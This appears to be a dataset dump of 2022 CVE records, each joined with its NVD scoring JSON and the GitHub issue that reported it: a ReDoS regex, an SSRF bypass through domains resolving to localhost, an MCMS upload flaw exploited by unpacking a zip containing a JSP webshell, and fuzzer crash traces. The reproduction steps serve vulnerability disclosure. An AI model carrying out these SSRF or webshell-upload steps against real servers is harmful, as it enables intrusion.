fa fa fa 0x0c18800092a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c18800092b0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c18800092c0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c18800092d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==481618==ABORTING ```
AVX512-specific heap buffer overflow with 3.0.4 release
https://api.github.com/repos/openssl/openssl/issues/18625/comments
27
2022-06-22T08:51:51Z
2022-07-18T15:16:57Z
https://github.com/openssl/openssl/issues/18625
1,279,803,279
18,625
3,813
CVE-2022-25758
2022-07-01T20:15:07.847
All versions of package scss-tokenizer are vulnerable to Regular Expression Denial of Service (ReDoS) via the loadAnnotation() function, due to the usage of insecure regex.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sasstools/scss-tokenizer/issues/45" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2936782" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-SCSSTOKENIZER-2339884" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sasstools/scss-tokenizer/issues/45" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-2936782" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-SCSSTOKENIZER-2339884" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:scss-tokenizer_project:scss-tokenizer:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "341E73F1-2D99-4B4E-8497-A126A3FA9F1C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1333" ]
1333
https://github.com/sasstools/scss-tokenizer/issues/45
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sasstools", "scss-tokenizer" ]
Dear SCSS-Tokenizer Team, In scanning my node_modules for [Regular Expression Denial of Service (ReDoS) Affecting org.webjars.npm:postcss](https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1255641) and [CVE-2021-23382](https://nvd.nist.gov/vuln/detail/CVE-2021-23382) I encountered scss-tokenizer with [previous-map.js](https://github.com/sasstools/scss-tokenizer/blob/master/src/previous-map.js#L34) with the same style regular expression that is cited in the CVE [commit](https://github.com/postcss/postcss/commit/2b1d04c867995e55124e0a165b7c6622c1735956). *postcss* ``` return sourceMapString.match(/\/\*\s*# sourceMappingURL=(.*)\*\//)[1].trim() ``` *scss-tokenizer* ``` let match = css.match(/\/\*\s*# sourceMappingURL=(.*)\s*\*\//) ``` It's slightly different, and maybe worth your time to double check. I hope this helps.
CVE-2021-23382 Might apply?
https://api.github.com/repos/sasstools/scss-tokenizer/issues/45/comments
2
2022-01-12T21:11:06Z
2022-08-10T01:30:25Z
https://github.com/sasstools/scss-tokenizer/issues/45
1,100,793,167
45
3,814
CVE-2022-25876
2022-07-01T20:15:07.917
The package link-preview-js before 2.1.16 are vulnerable to Server-side Request Forgery (SSRF) which allows attackers to send arbitrary requests to the local network and read the response. This is due to flawed DNS rebinding protection.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "LOW", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 2.1, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 6.2, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.5, "impactScore": 3.6, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ospfranco/link-preview-js/issues/115" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ospfranco/link-preview-js/pull/117" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-LINKPREVIEWJS-2933520" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ospfranco/link-preview-js/issues/115" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ospfranco/link-preview-js/pull/117" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-LINKPREVIEWJS-2933520" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:link-preview-js_project:link-preview-js:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "17008C45-5881-498A-B129-01ACA4E82F0D", "versionEndExcluding": "2.1.16", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "918" ]
918
https://github.com/ospfranco/link-preview-js/issues/115
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ospfranco", "link-preview-js" ]
**Describe** There is a way to bypass your regex to validate private & local networks. If we use http://127.0.0.1/ or http://localhost/ to link preview, we don't see it (`Error: link-preview-js did not receive a valid a url or text`), but if we use a domain that resolved to 127.0.0.1, we can. For example: localtest.me resolved to 127.0.0.1 (localhost), i.e. If you 'curl localtest.me', you'll see your localhost. Similarly we can read any other private & local address, any port. **To Reproduce** Steps to reproduce: 1. Find domain that resolved to private address with reverse ip lookup or use localtest.me (127.0.0.1) or devhead.net (127.0.0.1 + 192.168.1.1 + 192.168.0.1). 2. Write it to getLinkPreview. 3. Done. You see your local domain. **Screenshots** ![image](https://user-images.githubusercontent.com/47640060/170204508-717c1e40-57dc-424f-8ea1-1f029c6ede73.png)
SSRF
https://api.github.com/repos/OP-Engineering/link-preview-js/issues/115/comments
17
2022-05-25T07:33:47Z
2022-06-27T05:53:03Z
https://github.com/OP-Engineering/link-preview-js/issues/115
1,247,683,812
115
3,815
CVE-2022-31943
2022-07-01T21:15:08.147
MCMS v5.2.8 was discovered to contain an arbitrary file upload vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ming-soft/MCMS/issues/95" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/ming-soft/MCMS/issues/95" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mingsoft:mcms:5.2.8:*:*:*:*:*:*:*", "matchCriteriaId": "7C5B845C-EA6C-4362-B197-7C58FE4C8129", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/ming-soft/MCMS/issues/95
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "ming-soft", "MCMS" ]
1.代码分析 从铭飞官网https://gitee.com/mingSoft/MCMS把源码考下来之后 经过审计找到上传点,form.ftl这里有个文章缩略图上传点看他有没有做过滤然后根据action找到上传接口 <img width="415" alt="1" src="https://user-images.githubusercontent.com/106334576/170712617-eed47160-7a48-47b7-81e2-04c5e7837b39.png"> 经过查找在FileAction.class这里只判断了../防止目录跳跃,继续往下看点击继承的那个类 <img width="416" alt="2" src="https://user-images.githubusercontent.com/106334576/170713789-41f4735e-5954-465e-9c79-d1c0d480c8fc.png"> BaseFileAction.class发现他这做了后缀判断接着看是在哪调用的过滤 <img width="415" alt="3" src="https://user-images.githubusercontent.com/106334576/170714186-91554a14-269d-4135-b5df-1bf5c80e8fef.png"> 我们复制denied全局搜索,application.yml发现他是在配置文件里写了过滤,过滤了 exe,jsp,jspx,sh那说明除了这四个其他都可以上传 <img width="416" alt="4" src="https://user-images.githubusercontent.com/106334576/170716667-4949e5b5-c099-4688-a401-7ce55be9732f.png"> <img width="416" alt="5" src="https://user-images.githubusercontent.com/106334576/170717040-717e5010-395b-491d-887e-64d6c1fd510c.png"> 接着看看他有没有可利用的接口来实现上传jsp,经过查找TemplateAction.class里有个专门解析zip的接口。那么结合上面的过滤 可以上传zip,可以通过zip包含jsp恶意文件上传上去 然后调用这个接口去解析zip并解析树jsp并访问。 <img width="415" alt="6" src="https://user-images.githubusercontent.com/106334576/170720725-ab638239-13da-447f-94fe-0b9dbd711b4e.png"> 2.根据分析的代码操作 找到文章缩略图地址,点击上传zip <img width="365" alt="7" src="https://user-images.githubusercontent.com/106334576/170720925-762d4302-3c03-4046-a65c-5d4a88d05887.png"> <img width="415" alt="8" src="https://user-images.githubusercontent.com/106334576/170723495-b00f2d51-0a27-4e9c-bd47-5300b8687d12.png"> 上传上去之后右键复制图片路径,然后通过上面分析的调用解析zip的接口fileUrl=刚刚上传的zip回车提示执行成功 <img width="415" alt="9" src="https://user-images.githubusercontent.com/106334576/170723834-9584c5fb-1dda-4c05-959e-17d490acc949.png"> <img width="416" alt="10" src="https://user-images.githubusercontent.com/106334576/170724120-7dd8b2f6-601e-45d6-b8e0-3e81ad48aa7d.png"> <img width="416" alt="11" src="https://user-images.githubusercontent.com/106334576/170724354-027c7d16-0a65-43c1-a61e-23f186893c74.png"> 之后查看上传目录的地方,发现成功解压了在通过路径访问aaaaa.jsp,然后利用哥斯拉去连接他发现执行成功 <img width="416" alt="12" src="https://user-images.githubusercontent.com/106334576/170724472-b4fb5ddd-8e85-4c89-b8d2-546ab4821201.png"> <img width="415" alt="13" src="https://user-images.githubusercontent.com/106334576/170724763-4deb02e6-ea90-44aa-b6ec-1d7502704436.png"> <img width="415" alt="14" src="https://user-images.githubusercontent.com/106334576/170725035-1f8ade4a-98df-4bd2-8165-91712a04bcfa.png"> .
Mcms v5.2.8文件上传漏洞
https://api.github.com/repos/ming-soft/MCMS/issues/95/comments
3
2022-05-27T15:05:46Z
2022-10-11T07:27:35Z
https://github.com/ming-soft/MCMS/issues/95
1,250,873,195
95
3,816
CVE-2022-32324
2022-07-01T22:15:07.927
PDFAlto v0.4 was discovered to contain a heap buffer overflow via the component /pdfalto/src/pdfalto.cc.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kermitt2/pdfalto/issues/144" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kermitt2/pdfalto/issues/144" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pdfalto_project:pdfalto:0.4:*:*:*:*:*:*:*", "matchCriteriaId": "0F175631-FB59-4AC3-80E9-0BE1F7D088D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/kermitt2/pdfalto/issues/144
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kermitt2", "pdfalto" ]
sample here: [heap-bufferoverflow-pos-)%at pdfalto.zip](https://github.com/kermitt2/pdfalto/files/8811939/heap-bufferoverflow-pos-.at.pdfalto.zip) Describe info: ``` $ ./pdfalto heap-bufferoverflow-pos-\>at\ pdfalto.cc\:190\:5 ==43072==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6040000000f1 at pc 0x00000043f92b bp 0x7fff65e8f0f0 sp 0x7fff65e8e8a0 WRITE of size 33 at 0x6040000000f1 thread T0 #0 0x43f92a in strncat /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cpp:397 #1 0x503603 in main /home/bupt/Desktop/pdfalto/src/pdfalto.cc:190:5 #2 0x7f8cfec7dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #3 0x422ca9 in _start (/home/bupt/Desktop/pdfalto/build/pdfalto+0x422ca9) 0x6040000000f1 is located 0 bytes to the right of 33-byte region [0x6040000000d0,0x6040000000f1) allocated by thread T0 here: #0 0x4b5270 in malloc /home/bupt//tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x5035f1 in main /home/bupt/Desktop/pdfalto/src/pdfalto.cc:189:22 #2 0x7f8cfec7dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt//tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cpp:397 in strncat Shadow bytes around the buggy address: 0x0c087fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c087fff8000: fa fa fd fd fd fd fd fd fa fa 00 00 00 00 00 04 =>0x0c087fff8010: fa fa 00 00 00 00 00 01 fa fa 00 00 00 00[01]fa 0x0c087fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==43072==ABORTING ```
heap-buffer-overflow found?
https://api.github.com/repos/kermitt2/pdfalto/issues/144/comments
0
2022-06-01T07:31:05Z
2024-12-26T16:31:14Z
https://github.com/kermitt2/pdfalto/issues/144
1,255,225,282
144
3,817
CVE-2022-32325
2022-07-01T22:15:07.993
JPEGOPTIM v1.4.7 was discovered to contain a segmentation violation which is caused by a READ memory access at jpegoptim.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tjko/jpegoptim/issues/107" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XRPXTW3IARYQVKZBPIPIEKABN7DSS5XY/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/tjko/jpegoptim/issues/107" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XRPXTW3IARYQVKZBPIPIEKABN7DSS5XY/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpegoptim_project:jpegoptim:1.4.7:*:*:*:*:*:*:*", "matchCriteriaId": "3E659588-F2F1-4FD5-9851-287D91B13B64", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:37:*:*:*:*:*:*:*", "matchCriteriaId": "E30D0E6F-4AE8-4284-8716-991DFA48CC5D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/tjko/jpegoptim/issues/107
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "tjko", "jpegoptim" ]
hi, with the help of fuzzing ,I found some crash sample in this repo, here is the sample, are they new bugs? crash position jpegoptim.c:631:3 crash sample: crash1_SEGV_caused_by_READ_memory_access_at_jpegoptim.c:631:3 sample here: [crash1_SEGV_caused_by_READ_memory_access_at_jpegoptim.zip](https://github.com/tjko/jpegoptim/files/8819896/crash1_SEGV_caused_by_READ_memory_access_at_jpegoptim.zip) command: ./jpegoptim -f --all-progressive crash_sample ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==48067==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7f70c95ca086 bp 0x61c000000270 sp 0x7ffe18c37400 T0) ==48067==The signal is caused by a READ memory access. ==48067==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used. #0 0x7f70c95ca086 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x1f086) #1 0x7f70c95cad87 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x1fd87) #2 0x7f70c95c8e08 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x1de08) #3 0x7f70c95c14c6 in jpeg_consume_input (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x164c6) #4 0x7f70c95c176f in jpeg_read_header (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x1676f) #5 0x4f7f0d in main /home/bupt/Desktop/jpegoptim/jpegoptim.c:631:3 #6 0x7f70c8998c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #7 0x41cf09 in _start (/home/bupt/Desktop/jpegoptim/jpegoptim+0x41cf09) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x1f086) ==48067==ABORTING ``` ---------------------------------------------------------------------------------------------------------------------------------- crash position: jpegoptim.c:710:18 crash sample: crash2_SEGV_caused_by_READ_memory_access_at_jpegoptim.c:710:18 sample here: [crash_SEGV_caused_by_READ_memory_access_at_jpegoptim.zip](https://github.com/tjko/jpegoptim/files/8819903/crash_SEGV_caused_by_READ_memory_access_at_jpegoptim.zip) command: ./jpegoptim -f --all-progressive crash_sample ``` ==48074==ERROR: AddressSanitizer: SEGV on unknown address (pc 0x7f7896911086 bp 0x61c000000270 sp 0x7fffe7677e00 T0) ==48074==The signal is caused by a READ memory access. ==48074==Hint: this fault was caused by a dereference of a high value address (see register values below). Disassemble the provided pc to learn which register was used. #0 0x7f7896911086 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x1f086) #1 0x7f7896911d87 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x1fd87) #2 0x7f789690fe08 (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x1de08) #3 0x7f78969186ed in jpeg_read_coefficients (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x266ed) #4 0x4f8c9a in main /home/bupt/Desktop/jpegoptim/jpegoptim.c:710:18 #5 0x7f7895cdfc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #6 0x41cf09 in _start (/home/bupt/Desktop/jpegoptim/jpegoptim+0x41cf09) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/usr/lib/x86_64-linux-gnu/libjpeg.so.8+0x1f086) ==48074==ABORTING ```
SEGV caused by a READ memory access
https://api.github.com/repos/tjko/jpegoptim/issues/107/comments
6
2022-06-02T01:51:47Z
2023-01-05T04:40:37Z
https://github.com/tjko/jpegoptim/issues/107
1,257,496,511
107
3,818
CVE-2021-43116
2022-07-05T14:15:08.767
An Access Control vulnerability exists in Nacos 2.0.3 in the access prompt page; enter username and password, click on login to capture packets and then change the returned package, which lets a malicious user login.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": null, "url": "http://packetstormsecurity.com/files/171638/Nacos-2.0.3-Access-Control.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alibaba/nacos/issues/7127" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alibaba/nacos/issues/7182" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "http://packetstormsecurity.com/files/171638/Nacos-2.0.3-Access-Control.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alibaba/nacos/issues/7127" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/alibaba/nacos/issues/7182" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:*", "matchCriteriaId": "92C071B9-CC45-4164-986C-9DDE011EAB15", "versionEndExcluding": null, "versionEndIncluding": "2.0.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "287" ]
287
https://github.com/alibaba/nacos/issues/7127
